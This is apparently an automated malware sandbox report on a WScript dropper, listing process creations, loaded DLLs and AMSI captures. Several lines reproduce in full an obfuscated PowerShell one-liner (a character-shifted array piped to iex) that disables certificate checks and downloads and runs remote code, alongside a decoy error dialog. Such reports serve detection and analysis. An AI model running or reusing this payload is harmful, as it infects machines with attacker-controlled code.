Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^|%{[char]($_+381)})-join'') ^| ^&($BqIeP) "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^|%{[char]($_+381)})-join'') ^| ^&($BqIeP) "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell").Run("cmd /C ""echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | %WinDir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -""", 0, false) : Call MsgBox("Access denied.", 16, "Windows Explorer")IServerXMLHTTPRequest2.open("Get", "https://s4.histats.com/stats/0.php?4926118&@f16&@g1&@h1&@i1&@vhttps:/", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.open("Get", "https://s4.histats.com/stats/0.php?4926118&@f16&@g1&@h1&@i1&@vhttps:/", "false");IServerXMLHTTPRequest2.send();IWshShell3.Run("cmd /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $(", "0", "false")
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^|%{[char]($_+381)})-join'') ^| ^&($BqIeP) "
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^|%{[char]($_+381)})-join'') ^| ^&($BqIeP) "Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
